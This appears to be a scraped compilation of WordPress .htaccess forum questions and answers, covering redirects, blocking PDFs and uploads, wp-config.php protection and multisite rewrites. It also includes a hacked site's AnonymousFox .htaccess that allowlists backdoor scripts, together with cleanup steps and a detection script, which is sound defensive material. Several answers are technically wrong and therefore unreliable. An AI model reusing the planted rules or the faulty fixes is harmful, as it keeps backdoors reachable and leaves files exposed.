I'm currently using the WP htaccess Control plugin for my WordPress website and I would like to make a modification to its code. Presently, each page is accessible via multiple URL structures. For example, site.com/page/ is accessible, as is site.com/page.
I would like to set up the htaccess so that the non-trailing-slash URL redirects to the trailing-slash one, for every page of the site.
I believe I have the code, but I've seen a couple different variations. I want to make sure I implement the right one, plus I'm not exactly sure how it should be done with this particular plugin.
Do I just add the additional lines to the "custom" section? To my understanding it has to be placed with the rewrite rules, but the custom code I can input only goes to the top.
Currently, the following line is in "custom htaccess":
php_value memory_limit 96M
The entire file is:
# BEGIN WordPress
# WPhtc: Begin Custom htaccess
php_value memory_limit 96M
# WPhtc: End Custom htaccess
# WPhtC: Disable ServerSignature on generated error pages
ServerSignature Off
# WPhtC: Protect WP-config.php
<files wp-config.php>
order allow,deny
deny from all
</files>
# WPhtC: Protect .htaccess file
<files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
</files>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
Thank you
I've read a baker's dozen of similar questions and the common issues found therein have not helped me resolve this. I could really use some help figuring this out. What should I try next? Is there a way to troubleshoot why these rules are not being respected?
This is a WordPress environment on an InMotion Hosting VPS with WHM/cPanel and Apache 2.4. Nginx is not being used to cache this account.
I need to deny access to PDFs in a sub-directory, specifically:
/public_html/wp-content/uploads/gravity_forms/fillablepdfs/
My web root .htaccess is as follows.
/public_html/.htaccess
AllowOverride All
# BEGIN WordPress
# The directives (lines) between "BEGIN WordPress" and "END WordPress" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
# Wordfence WAF
<Files ".user.ini">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
# END Wordfence WAF
# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php74” package as the default “PHP” programming language.
<IfModule mime_module>
AddHandler application/x-httpd-ea-php74 .php .php7 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit
I have tried many combinations in the web-root .htaccess and in the sub-directories in the path to the directory in question.
These did not work:
/public_html/wp-content/uploads/gravity_forms/fillablepdfs/.htaccess
Order deny,allow
Deny from all
Require all denied
<Files "*.pdf">
Order deny,allow
Deny from all
</Files>
<Files "*.pdf">
Require all denied
</Files>
After those failed to work I moved up the directories attempting the same until I reached the web-root .htaccess again, where I tried the following.
/public_html/.htaccess
AllowOverride All
. . .
# BEGIN fillable-pdfs
# Restrict access to generated pdfs directory.
<Files "*.pdf">
Require all denied
</Files>
# END fillable-pdfs
AllowOverride All
. . .
# BEGIN fillable-pdfs
# Restrict access to generated pdfs directory.
<Files "*.pdf">
Order deny,allow
Deny from all
</Files>
# END fillable-pdfs
AllowOverride All
. . .
# BEGIN fillable-pdfs
# Restrict access to generated pdfs directory.
<Files "*.pdf">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
# END fillable-pdfs
AllowOverride All
. . .
# BEGIN fillable-pdfs
# Restrict access to generated pdfs directory.
<Files "wp-content/uploads/gravity_forms/fillablepdfs/*.pdf">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
# END fillable-pdfs
AllowOverride All
. . .
# BEGIN fillable-pdfs
# Restrict access to generated pdfs directory.
<Files "./wp-content/uploads/gravity_forms/fillablepdfs/*.pdf">
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
# END fillable-pdfs
None of these worked.
There are two other .htaccess files along the path. They are:
/public_html/wp-content/uploads/.htaccess
# BEGIN WebP Express
# The rules below have been dynamically created by WebP Express in accordance with the plugin settings
# DO NOT EDIT MANUALLY (unless you are prepared that your changes might be overridden by WebP Express)
# The following parameters have been in play to produce the rules:
#
# WebP Express options:
# - Operation mode: varied-image-responses
# - Redirection to existing webp: enabled
# - Redirection to converter: enabled
# - Redirection to converter to create missing webp files upon request for the webp: enabled
# - Destination folder: separate
# - Destination extension: append
# - Destination structure: image-roots
# - Image types: jpeg, png
# - Alter HTML enabled?: yes
#
# Wordpress/Server configuration:
# - Document root availablity: Available and its "realpath" is available too. Can be used for structuring cache dir.
#
# .htaccess capability test results:
# - mod_header working?: yes
# - pass variable from .htaccess to script through header working?: no
# - pass variable from .htaccess to script through environment variable working?: yes
#
# Role of the dir that this .htaccess is located in:
# - Is this .htaccess in a dir containing source images?: yes
# - Is this .htaccess in a dir containing webp images?: no
# Rules for handling requests for source images
# ---------------------------------------------
<IfModule mod_rewrite.c>
RewriteEngine On
# Escape hatch #1: Adding ?dontreplace to an url can be used to bypass redirection
RewriteCond %{QUERY_STRING} dontreplace$
RewriteCond %{REQUEST_FILENAME} -f
RewriteRule . - [L]
# Escape hatch #2: Placing an empty file in the same folder as the jpeg/png which has same file name, but ".dontreplace" appended will bypass redirection
RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$
RewriteCond %1%2\.dontreplace -f
RewriteRule . - [L]
# Deprecated escape hatch: Adding ?original to an url can be used to bypass redirection
RewriteCond %{QUERY_STRING} original$
RewriteCond %{REQUEST_FILENAME} -f
RewriteRule . - [L]
# Deprecated escape hatch: Placing an empty file in the same folder as the jpeg/png which has same file name, but ".do-not-convert" appended will bypass redirection
RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$
RewriteCond %1%2\.do-not-convert -f
RewriteRule . - [L]
# Avoid redirecting to webp files that are bigger than the original
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} (?i)(/home/***/public_html/wp-content/uploads/)(.*)(\.jpe?g|\.png)$
RewriteCond /home/***/public_html/wp-content/webp-express/webp-images-bigger-than-source/uploads/%2%3.webp -f
RewriteRule . - [L]
# Redirect to existing converted image in cache-dir (if browser supports webp)
RewriteCond %{HTTP_ACCEPT} image/webp
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} (?i)(/home/***/public_html/wp-content/uploads/)(.*)(\.jpe?g|\.png)$
RewriteCond /home/***/public_html/wp-content/webp-express/webp-images/uploads/%2%3.webp -f
RewriteRule (?i)(.*)(\.jpe?g|\.png)$ /wp-content/webp-express/webp-images/uploads/%2%3\.webp [T=image/webp,E=EXISTING:1,E=ADDVARY:1,L]
# Redirect images to webp-on-demand.php (if browser supports webp)
RewriteCond %{HTTP_ACCEPT} image/webp
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} (?i)(.*)(\.jpe?g|\.png)$
RewriteRule (?i).*$ /wp-content/plugins/webp-express/wod/webp-on-demand.php [E=WE_WP_CONTENT_REL_TO_WE_PLUGIN_DIR:../../,E=WE_SOURCE_REL_HTACCESS:$0,E=WE_HTACCESS_ID:uploads,NC,L]
# Make sure that browsers which does not support webp also gets the Vary:Accept header
# when requesting images that would be redirected to webp on browsers that does.
<IfModule mod_headers.c>
<FilesMatch "(?i)\.(jpe?g|png)$">
Header append "Vary" "Accept"
</FilesMatch>
</IfModule>
</IfModule>
# END WebP Express
/public_html/wp-content/uploads/gravity_forms/.htaccess
# BEGIN Gravity Forms
# The directives (lines) between "BEGIN Gravity Forms" and "END Gravity Forms" are
# dynamically generated, and should only be modified via WordPress filters.
# Any changes to the directives between these markers will be overwritten.
# Disable parsing of PHP for some server configurations. This file may be removed or modified on certain server configurations by using by the gform_upload_root_htaccess_rules filter. Please consult your system administrator before removing this file.
<Files *>
SetHandler none
SetHandler default-handler
Options -ExecCGI
RemoveHandler .cgi .php .php3 .php4 .php5 .phtml .pl .py .pyc .pyo
</Files>
<IfModule mod_php5.c>
php_flag engine off
</IfModule>
<IfModule headers_module>
Header set X-Robots-Tag "noindex"
</IfModule>
# END Gravity Forms
Nginx was configured to bypass Apache to "Accelerate static content".
Disabling this allows .htaccess files to function on .txt, .pdf, etc...
Please tell me what I can do to protect my .htaccess file. Recently I was hacked, and I noticed that I can navigate into different places of my wp-admin (Posts, Settings, Plugins, ...) and they show a permission page - forbidden. A .htaccess is generated, and an index.php and themes.php are also added to the root. I've deleted the .htaccess file, index.php and themes.php and I've created a new .htaccess which contains many lines of protection rules, but it's always replaced by a new one. How can I track down the hacked script, please?
Code of hacked .htaccess:
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|wp-login.php|load.php|themes.php|admin.php|settings.php|bottom.php|years.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>
Code of index.php:
This is an AnonymousFox hack. It is very sophisticated. See these steps to clean your hacked hosting account > https://forum.ait-pro.com/forums/topic/wp-dester-and-wpyii2-hacker-plugins/
Create lock666.php as a folder
Check if there is a suspicious cron job, delete it if any.
Remove all newly created .htaccess files
Remove all license.txt files
Remove all suspicious new .php files
random file name
If, after creating the "lock666.php" folder, you can't edit the .htaccess and index.php files, rename them to the ones in the hacked .htaccess file
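A detection sketch for the pattern in the hacked .htaccess quoted above (an added example, not part of the original thread): it flags any .htaccess that pairs a blanket deny on PHP extensions with an "Allow from all" list of named scripts, and reports which of those named scripts exist as files beside it. The names `classify_htaccess` and `scan` and the abbreviated `SAMPLE` are constructed for this example.

```python
import re
from pathlib import Path

# The tampered rules quoted in the post, abbreviated to four allowlisted names.
SAMPLE = '''<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php|asp|Php|aspx)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|index.php|lock666.php|wp-login.php)$">
Order allow,deny
Allow from all
</FilesMatch>
'''

BLOCK_RE = re.compile(
    r'<FilesMatch\s+"?(?P<pat>[^">]+)"?\s*>(?P<body>.*?)</FilesMatch>',
    re.IGNORECASE | re.DOTALL)
NAME_RE = re.compile(r"[\w-]+\\?\.php", re.IGNORECASE)  # explicit script names

def classify_htaccess(text):
    """Flag a blanket PHP deny combined with an allowlist of named scripts."""
    denies_php, allowlisted = False, []
    for m in BLOCK_RE.finditer(text):
        pat, body = m.group("pat"), m.group("body").lower()
        names = [n.replace("\\", "") for n in NAME_RE.findall(pat)]
        if "allow from all" in body and names:
            allowlisted += names
        elif "deny from all" in body and not names and "php" in pat.lower():
            denies_php = True
    return {"suspicious": denies_php and bool(allowlisted),
            "allowlisted": sorted(set(allowlisted))}

def scan(root):
    """Return (htaccess path, allowlisted scripts present beside it) per hit."""
    hits = []
    for ht in sorted(Path(root).rglob(".htaccess")):
        if not ht.is_file():
            continue
        result = classify_htaccess(ht.read_text(errors="replace"))
        if result["suspicious"]:
            present = [n for n in result["allowlisted"]
                       if (ht.parent / n).is_file()]
            hits.append((str(ht), present))
    return hits

if __name__ == "__main__":
    import sys
    for path, present in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(path, "->", ", ".join(present) or "(no allowlisted script here)")
```

Run it against the document root; each hit is a directory to inspect, and the listed scripts are the files that .htaccess was written to keep reachable.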
I am hoping you can help. I have been having real trouble getting a .htaccess file to work correctly.
I am trying to block off all access to files and folders within the wp-content/uploads/ folder.
I have resorted to placing a .htaccess file in each subdirectory with:
deny from all
This works OK if I FTP a file up and try to access it. The trouble is, if I use WordPress to upload a file (into the same folder), this file is accessible.
Any ideas on what's going on, and a solution?
Thanks in advance for any help.
Try writing a rule in the .htaccess file, something like:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
This will allow you to block off all access to files and folders within the wp-content/uploads/ folder.
I had a similar issue. Once I updated wildcard to include .html (root htaccess), my deny all in the subdirectory worked just fine.
From this:
<Files *>
order deny,allow
deny from env=notallowed
allow from env=allowsome
</Files>
To this:
order deny,allow
deny from env=notallowed
allow from env=allowsome
I have a few questions regarding the wp-config.php file in WordPress. I moved the file from the WordPress installation directory to above the www directory, inside one of the home folders. I followed this tutorial. In the main WordPress directory I added another wp-config.php file with the following include path:
<?php
include('/home/www/web55438/files/wp-config.php');
?>
Inside the files folder I also added the following .htaccess file.
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
#Prevent directory browsing
Options All -Indexes
#Protect files from displaying
<Files wp-config.php>
order allow,deny
deny from all
</Files>
#Protect htaccess file
<Files ~ "^.*\.([Hh][Tt][Aa])">
order allow,deny
deny from all
satisfy all
</Files>
My questions are: Is this a secure way of handling the wp-config.php file with an absolute path? Is the .htaccess file configured properly? And what would you change for better WordPress security?
Thanks
<Files wp-config.php>
order allow,deny
deny from all
</Files>
Change it to
<Files wp-config.php>
order deny,allow
deny from all
</Files>
This way, you are denying access to wp-config.php.
As you are moving your config file from the default location to a location above the root of your website, this is the proper way to include that file.
Regarding adding more security, follow stuff posted by Vhortex in one of the questions.
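How mod_access_compat evaluates the `Order`, `Allow` and `Deny` lines discussed above, as an added example that is not part of the original thread: it evaluates both wp-config.php blocks quoted in this exchange, then the same two orderings with an extra `Allow` line, where the ordering changes the result. The function names are hypothetical and the sketch models only `from all` and exact IP addresses, which is an assumption.

```python
# Constructed inputs: the two wp-config.php blocks from the thread and an
# extra Allow line using a documentation-range IP address.
BEFORE = "Order allow,deny\nDeny from all"
AFTER = "Order deny,allow\nDeny from all"
WITH_ALLOW = "Deny from all\nAllow from 203.0.113.10"

def parse_block(text):
    """Collect Order, Allow and Deny arguments from mod_access_compat lines."""
    order, allow, deny = "deny,allow", [], []   # Apache's default Order
    for line in text.splitlines():
        words = line.split("#")[0].lower().split()
        if len(words) == 2 and words[0] == "order":
            order = words[1]
        elif len(words) >= 3 and words[:2] == ["allow", "from"]:
            allow += words[2:]
        elif len(words) >= 3 and words[:2] == ["deny", "from"]:
            deny += words[2:]
    return order, allow, deny

def matches(sources, client_ip):
    # Assumption of this sketch: only "all" and exact IPs are modelled.
    return any(s in ("all", client_ip) for s in sources)

def is_allowed(block, client_ip):
    """Apply the documented rules: which list wins and what the default is."""
    order, allow, deny = parse_block(block)
    a, d = matches(allow, client_ip), matches(deny, client_ip)
    if order == "allow,deny":
        return a and not d      # default is deny; a Deny match always wins
    return a or not d           # default is allow; an Allow match always wins

def outcomes(client_ip):
    """Evaluate all four variants for one client address."""
    return {
        "before": is_allowed(BEFORE, client_ip),
        "after": is_allowed(AFTER, client_ip),
        "deny,allow + Allow": is_allowed("Order deny,allow\n" + WITH_ALLOW, client_ip),
        "allow,deny + Allow": is_allowed("Order allow,deny\n" + WITH_ALLOW, client_ip),
    }

if __name__ == "__main__":
    for ip in ("203.0.113.10", "198.51.100.7"):
        print(ip, outcomes(ip))
```

On Apache 2.4 with mod_authz_core, the equivalent single directive is `Require all denied`, as used in the Wordfence block earlier on this page.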
I have a WordPress multisite installed, and would like to understand how the subdomains are actually managed, i.e. how does my WordPress multisite know where to find the files/data when a browser requests the URL user1.domain.com?
I checked the DNS A record and see only the wild card.
I checked the .htaccess, and it looks as follows:
RewriteEngine On
RewriteBase /
# Protect the htaccess file
<Files .htaccess>
Order Allow,Deny
Deny from all
</Files>
# Protect wpconfig.php
<Files wp-config.php>
Order Allow,Deny
Deny from all
</Files>
# Disable directory browsing
Options All -Indexes
RewriteRule ^index\.php$ - [L]
# uploaded files
RewriteRule ^files/(.+) wp-includes/ms-files.php?file=$1 [L]
RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^ - [L]
RewriteRule . index.php [L]
So I think the .htaccess does not manage the subdomain, or does it?
So then, how does my WordPress multisite know where to find the files/data when a browser requests the URL user1.domain.com?